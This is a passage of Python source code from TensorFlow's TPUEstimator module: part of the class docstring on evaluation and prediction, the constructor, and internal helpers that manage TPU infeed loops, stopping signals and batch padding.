- For training, `model_fn` gets per-core batch size; `input_fn` may get
per-core or per-host batch size depending on `per_host_input_for_training`
in `TPUConfig` (See docstring for TPUConfig for details).
- For evaluation and prediction, `model_fn` gets per-core batch size and
`input_fn` get per-host batch size.
Evaluation
==========
`model_fn` should return `TPUEstimatorSpec`, which expects the `eval_metrics`
for TPU evaluation.
`TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`, where
`tensors` could be a list of `Tensor`s or dict of names to `Tensor`s. (See
`TPUEstimatorSpec` for details). `metric_fn` takes the `tensors` and returns
a dict from metric string name to the result of calling a metric function,
namely a `(metric_tensor, update_op)` tuple.
One can set `use_tpu` to `False` for testing. All training, evaluation, and
predict will be executed on CPU. `input_fn` and `model_fn` will receive
`train_batch_size` or `eval_batch_size` unmodified as `params['batch_size']`.
Current limitations:
--------------------
1. TPU evaluation only works on a single host (one TPU worker).
2. `input_fn` for evaluation should **NOT** raise an end-of-input exception
(`OutOfRangeError` or `StopIteration`). And all evaluation steps and all
batches should have the same size.
Example (MNIST):
----------------
```
# The metric Fn which runs on CPU.
def metric_fn(labels, logits):
predictions = tf.argmax(logits, 1)
return {
'accuracy': tf.metrics.precision(
labels=labels, predictions=predictions),
}
# Your model Fn which runs on TPU (eval_metrics is list in this example)
def model_fn(features, labels, mode, config, params):
...
logits = ...
if mode = tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, [labels, logits]))
# or specify the eval_metrics tensors as dict.
def model_fn(features, labels, mode, config, params):
...
final_layer_output = ...
if mode = tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, {
'labels': labels,
'logits': final_layer_output,
}))
```
Prediction
==========
Prediction on TPU is an experimental feature to support large batch inference.
It is not designed for latency-critical system. In addition, due to some
usability issues, for prediction with small dataset, CPU `.predict`, i.e.,
creating a new `TPUEstimator` instance with `use_tpu=False`, might be more
convenient.
Note: In contrast to TPU training/evaluation, the `input_fn` for prediction
*should* raise an end-of-input exception (`OutOfRangeError` or
`StopIteration`), which serves as the stopping signal to `TPUEstimator`. To be
precise, the ops created by `input_fn` produce one batch of the data.
The `predict()` API processes one batch at a time. When reaching the end of
the data source, an end-of-input exception should be raised by one of these
operations. The user usually does not need to do this manually. As long as the
dataset is not repeated forever, the `tf.data` API will raise an end-of-input
exception automatically after the last batch has been produced.
Note: Estimator.predict returns a Python generator. Please consume all the
data from the generator so that TPUEstimator can shutdown the TPU system
properly for user.
Current limitations:
--------------------
1. TPU prediction only works on a single host (one TPU worker).
2. `input_fn` must return a `Dataset` instance rather than `features`. In
fact, .train() and .evaluate() also support Dataset as return value.
Example (MNIST):
----------------
```
height = 32
width = 32
total_examples = 100
def predict_input_fn(params):
batch_size = params['batch_size']
images = tf.random_uniform(
[total_examples, height, width, 3], minval=-1, maxval=1)
dataset = tf.data.Dataset.from_tensor_slices(images)
dataset = dataset.map(lambda images: {'image': images})
dataset = dataset.batch(batch_size)
return dataset
def model_fn(features, labels, params, mode):
# Generate predictions, called 'output', from features['image']
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.contrib.tpu.TPUEstimatorSpec(
mode=mode,
predictions={
'predictions': output,
'is_padding': features['is_padding']
})
tpu_est = TPUEstimator(
model_fn=model_fn,
...,
predict_batch_size=16)
# Fully consume the generator so that TPUEstimator can shutdown the TPU
# system.
for item in tpu_est.predict(input_fn=input_fn):
# Filter out item if the `is_padding` is 1.
# Process the 'predictions'
```
Exporting
=========
Exporting `SavedModel` support on TPU is not yet implemented. So,
`export_savedmodel` is executed on CPU, even if `use_tpu` is true.
"""
def __init__(self,
model_fn=None,
model_dir=None,
config=None,
params=None,
use_tpu=True,
train_batch_size=None,
eval_batch_size=None,
predict_batch_size=None,
batch_axis=None):
"""Constructs an `TPUEstimator` instance.
Args:
model_fn: Model function as required by `Estimator`. For training, the
returned `EstimatorSpec` cannot have hooks as it is not supported in
`TPUEstimator`.
model_dir: Directory to save model parameters, graph and etc. This can
also be used to load checkpoints from the directory into a estimator to
continue training a previously saved model. If `None`, the model_dir in
`config` will be used if set. If both are set, they must be same. If
both are `None`, a temporary directory will be used.
config: An `tpu_config.RunConfig` configuration object. Cannot be `None`.
params: An optional `dict` of hyper parameters that will be passed into
`input_fn` and `model_fn`. Keys are names of parameters, values are
basic python types. There are reserved keys for `TPUEstimator`,
including 'batch_size'.
use_tpu: A bool indicating whether TPU support is enabled. Currently,
- TPU training and evaluation respect this bit.
- Predict still happens on CPU.
train_batch_size: An int representing the global training batch size.
TPUEstimator transforms this global batch size to a per-shard batch
size, as params['batch_size'], when calling `input_fn` and `model_fn`.
Cannot be `None` if `use_tpu` is `True`.
Must be divisible by total number of replicas.
eval_batch_size: An int representing evaluation batch size.
Must be divisible by total number of replicas.
predict_batch_size: An int representing the prediction batch size.
Must be divisible by total number of replicas.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards. For example, if your input_fn produced (images, labels)
where the images tensor is in `HWCN` format, your shard dimensions would
be [3, 0], where 3 corresponds to the `N` dimension of your images
Tensor, and 0 corresponds to the dimension along which to split the
labels to match up with the corresponding images. If None is supplied,
and per_host_input_for_training is True, batches will be sharded based
on the major dimension. If tpu_config.per_host_input_for_training is
False or `PER_HOST_V2`, batch_axis is ignored.
Raises:
ValueError: `params` has reserved keys already.
"""
if config is None or not isinstance(config, tpu_config.RunConfig):
raise ValueError(
'`config` must be provided with type `tpu_config.RunConfig`')
if params is not None and any(k in params for k in _RESERVED_PARAMS_KEYS):
raise ValueError('{} are reserved keys but existed in params {}.'.format(
_RESERVED_PARAMS_KEYS, params))
if use_tpu:
# Perform some very basic validations. More validations will be found in
# _TPUContext.
if train_batch_size is None:
raise ValueError('`train_batch_size` cannot be `None`')
util_lib.check_positive_integer(train_batch_size, 'train_batch_size')
if (config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.PER_SHARD_V1 and
config.tpu_config.computation_shape):
raise ValueError(
'Model parallelism only supports per host input for training. '
'Please adjust TPURunconfig.per_host_input_for_training.')
if eval_batch_size is not None:
util_lib.check_positive_integer(eval_batch_size, 'eval_batch_size')
if predict_batch_size is not None:
util_lib.check_positive_integer(predict_batch_size,
'predict_batch_size')
# Verifies the model_fn signature according to Estimator framework.
estimator_lib._verify_model_fn_args(model_fn, params) # pylint: disable=protected-access
# We cannot store config and params in this constructor as parent
# constructor might change them, such as assigning a temp dir for
# config.model_dir.
model_function = self._augment_model_fn(model_fn, batch_axis)
# Passing non-None params as wrapped model_fn has it.
params = params or {}
super(TPUEstimator, self).__init__(
model_fn=model_function,
model_dir=model_dir,
config=config,
params=params)
self._iterations_per_training_loop = (
self._config.tpu_config.iterations_per_loop)
# All properties passed to _TPUContext are immutable.
# pylint: disable=protected-access
self._ctx = tpu_context._get_tpu_context(
self._config, train_batch_size,
eval_batch_size, predict_batch_size,
use_tpu)
self._is_input_fn_invoked = None
def _create_global_step(self, graph):
"""Creates a global step suitable for TPUs.
Args:
graph: The graph in which to create the global step.
Returns:
A global step `Tensor`.
Raises:
ValueError: if the global step tensor is already defined.
"""
return _create_global_step(graph)
def _convert_train_steps_to_hooks(self, steps, max_steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.TRAIN) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_train_steps_to_hooks(
steps, max_steps)
# On TPU.
if steps is None and max_steps is None:
raise ValueError(
'For TPU training, one of `steps` or `max_steps` must be set. '
'Cannot be both `None`.')
# Estimator.train has explicit positiveness check.
if steps is not None:
util_lib.check_positive_integer(steps, 'Train steps')
if max_steps is not None:
util_lib.check_positive_integer(max_steps, 'Train max_steps')
return [
_TPUStopAtStepHook(self._iterations_per_training_loop, steps, max_steps)
]
def _convert_eval_steps_to_hooks(self, steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.EVAL) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_eval_steps_to_hooks(steps)
if steps is None:
raise ValueError('Evaluate `steps` must be set on TPU. Cannot be `None`.')
util_lib.check_positive_integer(steps, 'Eval steps')
return [
evaluation._StopAfterNEvalsHook( # pylint: disable=protected-access
num_evals=steps),
_SetEvalIterationsHook(steps)
]
def _call_input_fn(self, input_fn, mode):
"""Calls the input function.
Args:
input_fn: The input function.
mode: ModeKeys
Returns:
Either features or (features, labels) where features and labels are:
features - `Tensor` or dictionary of string feature name to `Tensor`.
labels - `Tensor` or dictionary of `Tensor` with labels.
Raises:
ValueError: if input_fn takes invalid arguments or does not have `params`.
"""
input_fn_args = util.fn_args(input_fn)
config = self.config # a deep copy.
kwargs = {}
if 'params' in input_fn_args:
kwargs['params'] = self.params # a deep copy.
else:
raise ValueError('input_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params["batch_size"]'.format(input_fn))
if 'config' in input_fn_args:
kwargs['config'] = config
if 'mode' in input_fn_args:
kwargs['mode'] = mode
# Records the fact input_fn has been invoked.
self._is_input_fn_invoked = True
with self._ctx.with_mode(mode) as ctx:
# Setting the batch size in params first. This helps user to have same
# input_fn for use_tpu=True/False.
batch_size_for_input_fn = ctx.batch_size_for_input_fn
if batch_size_for_input_fn is not None:
if isinstance(kwargs['params'], hparam.HParams):
kwargs['params'].add_hparam(_BATCH_SIZE_KEY, batch_size_for_input_fn)
else:
kwargs['params'][_BATCH_SIZE_KEY] = batch_size_for_input_fn
# For export_savedmodel, input_fn is never passed to Estimator. So,
# `is_export_mode` must be False.
if ctx.is_running_on_cpu(is_export_mode=False):
with ops.device('/device:CPU:0'):
return input_fn(**kwargs)
# For TPU computation, input_fn should be invoked in a tf.while_loop for
# performance. While constructing the tf.while_loop, the structure of
# inputs returned by the `input_fn` needs to be recorded. The structure
# includes whether features or labels is dict or single Tensor, dict keys,
# tensor shapes, and dtypes. The recorded structure is used to create the
# infeed dequeue ops, which must be wrapped and passed as a Fn, called
# inside the TPU computation, as the TPU computation is wrapped inside a
# tf.while_loop also. So, we either pass input_fn to model_fn or pass
# dequeue_fn to model_fn. Here, `input_fn` is passed directly as
# `features` in `model_fn` signature.
def _input_fn():
return input_fn(**kwargs)
return _input_fn
def _validate_features_in_predict_input(self, result):
"""Skip the validation.
For TPUEstimator, we do not need to check the result type. `_InputPipeline`
has stronger check. Parent class's check generates confusing warning msg.
Args:
result: `features` returned by input_fn.
"""
pass
def _augment_model_fn(self, model_fn, batch_axis):
"""Returns a new model_fn, which wraps the TPU support."""
def _model_fn(features, labels, mode, config, params):
"""A Estimator `model_fn` for TPUEstimator."""
with self._ctx.with_mode(mode) as ctx:
model_fn_wrapper = _ModelFnWrapper(model_fn, config, params, ctx)
if mode != model_fn_lib.ModeKeys.PREDICT:
is_export_mode = False
else:
# For export_savedmodel, input_fn is never passed to Estimator. So, by
# checking the self._is_input_fn_invoked bit, we can know, given the
# mode == PREDICT, it is the .predict API, not export_savedmodel API.
if self._is_input_fn_invoked:
is_export_mode = False
else:
is_export_mode = True
# Clear the bit.
self._is_input_fn_invoked = None
if ctx.is_running_on_cpu(is_export_mode=is_export_mode):
logging.info('Running %s on CPU', mode)
return model_fn_wrapper.call_without_tpu(
features, labels, is_export_mode=is_export_mode)
assert labels is None, '`labels` passed to `model_fn` must be `None`.'
# TPUEstimator._call_input_fn passes `input_fn` as features to here.
assert callable(features), '`input_fn` is not callable.'
input_fn = features
input_holders = _InputPipeline(input_fn, batch_axis, ctx)
enqueue_ops, dequeue_fn, input_hooks, run_infeed_loop_on_coordinator = (
input_holders.generate_infeed_enqueue_ops_and_dequeue_fn())
graph = ops.get_default_graph()
for enqueue_op in enqueue_ops:
if isinstance(enqueue_op, list):
graph.get_collection_ref(_TPU_ENQUEUE_OPS).extend(enqueue_op)
else:
graph.add_to_collection(_TPU_ENQUEUE_OPS, enqueue_op)
if mode == model_fn_lib.ModeKeys.TRAIN:
loss, host_call, scaffold = (
_train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
host_ops = host_call.create_tpu_hostcall()
if host_ops is None:
host_ops = []
hooks = [
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
host_ops,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator)),
ExamplesPerSecondHook(ctx.global_batch_size,
output_dir=self.model_dir),
InstallSignalHandlerHook(),
training.LoggingTensorHook(
{
'loss': array_ops.identity(loss),
'step': training.get_global_step()
},
every_n_secs=30)
] + input_hooks
summary.scalar(model_fn_lib.LOSS_METRIC_KEY, loss)
with ops.control_dependencies([loss]):
update_ops = _sync_variables_ops()
# Validate the TPU training graph to catch basic errors
_validate_tpu_training_graph()
train_op = control_flow_ops.group(*update_ops)
graph.add_to_collection(_TPU_TRAIN_OP, train_op)
return model_fn_lib.EstimatorSpec(
mode,
loss=loss,
training_hooks=hooks,
train_op=train_op,
scaffold=scaffold)
if mode == model_fn_lib.ModeKeys.EVAL:
total_loss, host_calls, scaffold = _eval_on_tpu_system(
ctx, model_fn_wrapper, dequeue_fn)
iterations_per_loop_var = _create_or_get_iterations_per_loop()
mean_loss = math_ops.div(total_loss,
math_ops.cast(
iterations_per_loop_var,
dtype=total_loss.dtype))
# Creates a dummy metric update_op for all metrics. Estimator expects
# all metrics in eval_metric_ops have update_op and calls them one by
# one. The real metric update_ops are invoked in a separated thread.
# So, here give Estimator the dummy op for all metrics.
with ops.control_dependencies([mean_loss]):
# After TPU evaluation computation is done (the mean_loss tensor),
# reads all variables back from TPU and updates the eval step
# counter properly
internal_ops_to_run = _sync_variables_ops()
internal_ops_to_run.append(
_increase_eval_step_op(iterations_per_loop_var))
with ops.control_dependencies(internal_ops_to_run):
dummy_update_op = control_flow_ops.no_op()
host_call_ret = host_calls.create_tpu_hostcall()
eval_metric_ops = {}
eval_update_ops = []
for k, v in host_call_ret['eval_metrics'].items():
eval_metric_ops[k] = (v[0], dummy_update_op)
eval_update_ops.append(v[1])
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
hooks = [
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
eval_update_ops + host_ops,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator)),
] + input_hooks
return model_fn_lib.EstimatorSpec(
mode,
loss=mean_loss,
evaluation_hooks=hooks,
eval_metric_ops=eval_metric_ops,
scaffold=scaffold)
# Predict
assert mode == model_fn_lib.ModeKeys.PREDICT
dummy_predict_op, host_calls, scaffold = _predict_on_tpu_system(
ctx, model_fn_wrapper, dequeue_fn)
with ops.control_dependencies([dummy_predict_op]):
internal_ops_to_run = _sync_variables_ops()
with ops.control_dependencies(internal_ops_to_run):
dummy_predict_op = control_flow_ops.no_op()
# In train and evaluation, the main TPU program is passed to monitored
# training session to run. Infeed enqueue and outfeed dequeue are
# executed in side threads. This is not the configuration for
# prediction mode.
#
# For prediction, the Estimator executes the EstimatorSpec.predictions
# directly and yield the element (via generator) to call site. So, the
# outfeed based prediction must be passed to MonitoredSession directly.
# Other parts of the TPU execution are organized as follows.
#
# 1. All outfeed based Tensors must be grouped with predictions Tensors
# to form a single invocation. This avoid the issue we might trigger
# multiple outfeeds incorrectly. To achieve this, `host_call` is
# placed in control_dependencies of `stopping_signals`, and
# `stopping_signals` is passed into _StoppingPredictHook, which sets
# the `stopping_signals` as SessionRunArgs. MonitoredSession merges
# all SessionRunArgs with the fetch in session.run together.
#
# 2. The TPU program (dummy_predict_op) and enqueue_ops (infeed Enqueue)
# are grouped together. They will be launched once and only once in
# side threads and they quit naturally according to the SAME stopping
# condition.
enqueue_ops.append(dummy_predict_op)
host_call_ret = host_calls.create_tpu_hostcall()
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
predictions = host_call_ret['predictions']
_verify_cross_hosts_transfer_size(
predictions, message=(
'The estimated size for TPUEstimatorSpec.predictions is too '
'large.'))
signals = host_call_ret['signals']
with ops.control_dependencies(host_ops):
host_ops = [] # Empty, we do do not need it anymore.
scalar_stopping_signal = _StopSignals.as_scalar_stopping_signal(
signals)
predictions = _PaddingSignals.slice_tensor_or_dict(
predictions, signals)
hooks = [
_StoppingPredictHook(scalar_stopping_signal),
TPUInfeedOutfeedSessionHookForPrediction(ctx, enqueue_ops,
host_ops),
] + input_hooks
return model_fn_lib.EstimatorSpec(
mode,
prediction_hooks=hooks,
predictions=predictions,
scaffold=scaffold)
return _model_fn
def _eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
single_tpu_eval_step, host_calls, captured_scaffold_fn = (
model_fn_wrapper.convert_to_single_tpu_eval_step(dequeue_fn))
def multi_tpu_eval_steps_on_single_shard():
return training_loop.repeat(
iterations_per_loop_var,
single_tpu_eval_step, [_ZERO_LOSS])
(loss,) = tpu.shard(
multi_tpu_eval_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
scaffold = _get_scaffold(captured_scaffold_fn)
return loss, host_calls, scaffold
def _train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
single_tpu_train_step, host_call, captured_scaffold_fn = (
model_fn_wrapper.convert_to_single_tpu_train_step(dequeue_fn))
def multi_tpu_train_steps_on_single_shard():
return training_loop.repeat(
iterations_per_loop_var,
single_tpu_train_step, [_INITIAL_LOSS])
(loss,) = tpu.shard(
multi_tpu_train_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
scaffold = _get_scaffold(captured_scaffold_fn)
return loss, host_call, scaffold
def _predict_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
num_cores = ctx.num_cores
single_tpu_predict_step, host_calls, captured_scaffold_fn = (
model_fn_wrapper.convert_to_single_tpu_predict_step(dequeue_fn))
def multi_tpu_predict_steps_on_single_shard():
def cond(scalar_stopping_signal):
return math_ops.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
inputs = [_StopSignals.NON_STOPPING_SIGNAL]
outputs = training_loop.while_loop(
cond, single_tpu_predict_step, inputs=inputs, name=b'loop')
return outputs
(dummy_predict_op,) = tpu.shard(
multi_tpu_predict_steps_on_single_shard,
inputs=[],
num_shards=num_cores,
outputs_from_all_shards=False)
scaffold = _get_scaffold(captured_scaffold_fn)
return dummy_predict_op, host_calls, scaffold
def _wrap_computation_in_while_loop(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def computation(i):
with ops.control_dependencies(op_fn()):
return i + 1
iterations_per_loop_var = _create_or_get_iterations_per_loop()
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with ops.device(device):
iterations = array_ops.identity(iterations_per_loop_var)
return control_flow_ops.while_loop(
lambda i: i < iterations,
computation, [constant_op.constant(0)],
parallel_iterations=1)
def _wrap_computation_in_while_loop_with_stopping_signals(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def cond(scalar_stopping_signal):
return math_ops.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
def computation(unused_scalar_stopping_signal):
return_value = op_fn()
execute_ops = return_value['ops']
signals = return_value['signals']
with ops.control_dependencies(execute_ops):
return _StopSignals.as_scalar_stopping_signal(signals)
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with ops.device(device):
return control_flow_ops.while_loop(
cond,
computation, [_StopSignals.NON_STOPPING_SIGNAL],
parallel_iterations=1)
def _validate_tpu_training_graph():
"""Validate graph before running distributed training.
Raises:
ValueError: If the graph seems invalid for running on device
"""
operations = ops.get_default_graph().get_operations()
# Check if there is atleast one CrossReplicaSum operation in the graph
# This should be introduced by using the CrossShardOptimizer wrapper
cross_replica_sum_ops = [
o for o in operations if o.type == _CROSS_REPLICA_SUM_OP
]
if not cross_replica_sum_ops:
raise ValueError(
'CrossShardOptimizer must be used for model training on TPUs.')
class _CapturedObject(object):
"""A placeholder to capture an object.
This is useful when we need to capture a Python object in the Tensorflow
control flow body function and use it outside the control flow.
"""
def __init__(self):
self._object = None
self._captured = False
def capture(self, o):
if self._captured:
raise RuntimeError(
'InternalError: Object can be captured only. Please file bug .')
self._captured = True
self._object = o
def get(self):
if not self._captured:
raise RuntimeError(
'InternalError: Object is not captured properly before `get`. '
'Please file bug .')
return self._object
def _get_scaffold(captured_scaffold_fn):
"""Retrieves the Scaffold from `captured_scaffold_fn`."""
with _CapturingContext(message='Inside scaffold_fn'):
scaffold_fn = captured_scaffold_fn.get()
if scaffold_fn:
scaffold = scaffold_fn()
if scaffold is None:
raise ValueError(
'TPUEstimatorSpec.scaffold_fn returns None, which is not allowed')
else:
scaffold = None
if scaffold:
wrapped_finalize = scaffold.finalize
def _finalize():
with _CapturingContext('Inside Scaffold.finalize'):
wrapped_finalize()
scaffold.finalize = _finalize
return scaffold
class _CapturingContext(control_flow_ops.ControlFlowContext):
"""Tracks references to Tensors defined in TPU replication."""
def __init__(self, message):
control_flow_ops.ControlFlowContext.__init__(self)
self._message = message
def AddOp(self, op): # pylint: disable=invalid-name
for c in op.inputs:
if tpu._TPU_REPLICATE_ATTR in c.op.node_def.attr: # pylint: disable=protected-access
raise ValueError('{}: Op {} depends on TPU computation {}, '
'which is not allowed.'.format(self._message, op, c))
def __enter__(self):
# pylint: disable=protected-access
self._g = ops.get_default_graph()
self._old = self._g._get_control_flow_context()
self._g._set_control_flow_context(self)
# pylint: enable=protected-access
def __exit__(self, _, __, ___): # pylint: disable=invalid-name
self._g._set_control_flow_context(self._old) # pylint: disable=protected-access
class _Inputs(object):
"""A data structure representing the input_fn returned values.
This also supports the returned value from input_fn as `Dataset`.
"""
def __init__(self, features=None, labels=None, dataset=None, signals=None):
if dataset is not None and (features is not None or labels is not None or
signals is not None):
raise RuntimeError('Internal Error: Either (features and labels) or '
'dataset should be provided, not both. Please file '
'bug')
self._features = features
self._labels = labels
self._signals = signals
self._dataset = dataset
self._iterator = None
@staticmethod
def from_input_fn(return_values):
"""Returns an `_Inputs` instance according to `input_fn` return value."""
if isinstance(return_values, dataset_ops.Dataset):
dataset = return_values
return _Inputs(dataset=dataset)
features, labels = _Inputs._parse_inputs(return_values)
return _Inputs(features, labels)
@staticmethod
def _parse_inputs(return_values):
if isinstance(return_values, tuple):
features, labels = return_values
else:
features, labels = return_values, None
return features, labels
@property
def is_dataset(self):
"""Returns True if the return value from input_fn is Dataset."""
return self._dataset is not None
def dataset_initializer_hook(self):
"""Returns a `SessionRunHook` to initialize this dataset.
This must be called before `features_and_labels`.
"""
iterator = self._dataset.make_initializable_iterator()
# pylint: disable=protected-access
hook = estimator_lib._DatasetInitializerHook(iterator)
self._iterator = iterator
return hook
def features_and_labels(self):
"""Gets `features` and `labels`."""
if self.is_dataset:
if self._iterator is None:
raise RuntimeError('Internal error: Must call dataset_initializer_hook '
'before calling features_and_labels(). Please file '
'a bug!')
return _Inputs._parse_inputs(self._iterator.get_next())
return (self._features, self._labels)
def signals(self):
return self._signals
@property
def dataset(self):
return self._dataset
class _InputsWithStoppingSignals(_Inputs):
"""Inputs with `_StopSignals` inserted into the dataset."""
def __init__(self, dataset, batch_size, add_padding=False):
assert dataset is not None
user_provided_dataset = dataset.map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=False, batch_size=batch_size, add_padding=add_padding))
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
dataset = user_provided_dataset.concatenate(final_batch_dataset).prefetch(2)
super(_InputsWithStoppingSignals, self).__init__(dataset=dataset)
self._current_inputs = None
def features_and_labels(self):
if self._current_inputs is not None:
raise RuntimeError(
'Internal Error: The previous inputs have not been properly '
'consumed. First call features_and_labels, then call signals.')
inputs_with_signals = self._iterator.get_next()
features = inputs_with_signals['features']
labels = inputs_with_signals.get('labels')
self._current_inputs = inputs_with_signals
return features, labels
def signals(self):
"""Returns the `Signals` from `_Inputs`."""
if self._current_inputs is None:
raise RuntimeError(
'Internal Error: The current inputs have not been properly '
'generated. First call features_and_labels, then call signals.')
signals = self._current_inputs['signals']
self._current_inputs = None
return signals
@staticmethod
def insert_stopping_signal(stop, batch_size, add_padding=False):
"""Inserts stopping_signal into dataset via _map_fn.
Here we change the data structure in the dataset, such that the return value
is a dictionary now and `features`, `labels`, and `signals` are three
distinguished keys in that dict. This provides a better structure, which
eases the process to decompose the inputs (see `features_and_labels`).
Args:
stop: bool, state of current stopping signals.
batch_size: int, batch size.
add_padding: bool, whether to pad the tensor to full batch size.
Returns:
A map_fn passed to dataset.map API.
"""
def _map_fn(*args):
"""The map fn to insert signals."""
if len(args) == 1:
# Unpack the single Tensor/dict argument as features. This is required
# for the input_fn returns no labels.
args = args[0]
features, labels = _Inputs._parse_inputs(args)
new_input_dict = {}
if add_padding:
padding_mask, features, labels = (
_PaddingSignals.pad_features_and_labels(
features, labels, batch_size))
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
else:
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
padding_mask = None
new_input_dict['signals'] = _StopSignals(
stop=stop, batch_size=batch_size, padding_mask=padding_mask).as_dict()
return new_input_dict
return _map_fn
class _StopSignals(object):
"""Signals class holding all logic to handle TPU stopping condition."""
NON_STOPPING_SIGNAL = False
STOPPING_SIGNAL = True
def __init__(self, stop, batch_size, padding_mask=None):
self._stop = stop
self._batch_size = batch_size
self._padding_mask = padding_mask
def as_dict(self):
"""Returns the signals as Python dict."""
shape = [self._batch_size, 1]
dtype = dtypes.bool
if self._stop:
stopping = array_ops.ones(shape=shape, dtype=dtype)
else:
stopping = array_ops.zeros(shape=shape, dtype=dtype)
signals = {'stopping': stopping}
if self._padding_mask is not None:
signals['padding_mask'] = self._padding_mask
return signals
@staticmethod
def as_scalar_stopping_signal(signals):
return array_ops.identity(signals['stopping'][0][0])
@staticmethod
def should_stop(scalar_stopping_signal):
if isinstance(scalar_stopping_signal, ops.Tensor):
# STOPPING_SIGNAL is a constant True. Here, the logical_and is just the TF
# way to express the bool check whether scalar_stopping_signal is True.
return math_ops.logical_and(
scalar_stopping_signal, _StopSignals.STOPPING_SIGNAL)
else:
# For non Tensor case, it is used in SessionRunHook. So, we cannot modify
# the graph anymore. Here, we use pure Python.
return bool(scalar_stopping_signal)
class _PaddingSignals(object):
"""Signals class holding all logic to handle padding."""
@staticmethod
def pad_features_and_labels(features, labels, batch_size):
"""Pads out the batch dimension of features and labels."""
real_batch_size = array_ops.shape(
_PaddingSignals._find_any_tensor(features))[0]
batch_size_tensor = constant_op.constant(batch_size, dtypes.int32)
check_greater = check_ops.assert_greater_equal(
batch_size_tensor, real_batch_size,
data=(batch_size_tensor, real_batch_size),
message='The real batch size should not be greater than batch_size.')
with ops.control_dependencies([check_greater]):
missing_count = batch_size_tensor - real_batch_size
def pad_single_tensor(tensor):
"""Pads out the batch dimension of a tensor to the complete batch_size."""
rank = len(tensor.shape)
assert rank > 0
padding = array_ops.stack([[0, missing_count]] + [[0, 0]] * (rank - 1))
padded_shape = (batch_size,) + tuple(tensor.shape[1:])
padded_tensor = array_ops.pad(tensor, padding)
padded_tensor.set_shape(padded_shape)
return padded_tensor
def nest_pad(tensor_or_dict):
return nest.map_structure(pad_single_tensor, tensor_or_dict)
features = nest_pad(features)
if labels is not None:
labels = nest_pad(labels)
padding_mask = _PaddingSignals._padding_mask(
real_batch_size, missing_count, batch_size)
return padding_mask, features, labels
@staticmethod
def slice_tensor_or_dict(tensor_or_dict, signals):
"""Slice the real Tensors according to padding mask in signals."""
padding_mask = signals['padding_mask']
batch_size = array_ops.shape(padding_mask)[0]
def verify_batch_size(tensor):
check_batch_size = math_ops.equal(batch_size, tensor.shape[0])
with ops.control_dependencies([check_batch_size]):
return array_ops.identity(tensor)
def slice_single_tensor(tensor):
rank = len(tensor.shape)
assert rank > 0
real_batch_size = batch_size - math_ops.reduce_sum(padding_mask)
return verify_batch_size(tensor)[0:real_batch_size]
# As we split the Tensors to all TPU cores and concat them back, it is
# important to ensure the real data is placed before padded ones, i.e.,
# order is preserved. By that, the sliced padding mask should have all 0's.
# If this assertion failed, # the slice logic here would not hold.
sliced_padding_mask = slice_single_tensor(padding_mask)
assert_padding_mask = math_ops.equal(
math_ops.reduce_sum(sliced_padding_mask), 0)
with ops.control_dependencies([assert_padding_mask]):
should_stop = _StopSignals.should_stop(
_StopSignals.as_scalar_stopping_signal(signals))
is_full_batch = math_ops.equal(math_ops.reduce_sum(padding_mask), 0)
def slice_fn(tensor):
# If the current batch is full batch or part of stopping signals, we do
# not need to slice to save performance.
return control_flow_ops.cond(
math_ops.logical_or(should_stop, is_full_batch),
(lambda: verify_batch_size(tensor)),
(lambda: slice_single_tensor(tensor)))
return nest.map_structure(slice_fn, tensor_or_dict)
@staticmethod
def _find_any_tensor(batch_features):
tensors = [x for x in nest.flatten(batch_features)
if isinstance(x, ops.Tensor)]
if not tensors:
raise ValueError('Cannot find any Tensor in features dict.')
return tensors[0]
@staticmethod
def _padding_mask(real_batch_size, missing_count, batch_size):
padding_mask = array_ops.concat(
[
array_ops.zeros((real_batch_size,), dtype=dtypes.int32),
array_ops.ones((missing_count,), dtype=dtypes.int32)
],
axis=0)
padding_mask.set_shape((batch_size,))
return padding_mask
class _SignalsHelper(object):
"""A general helper class to handle common signals manipulation."""
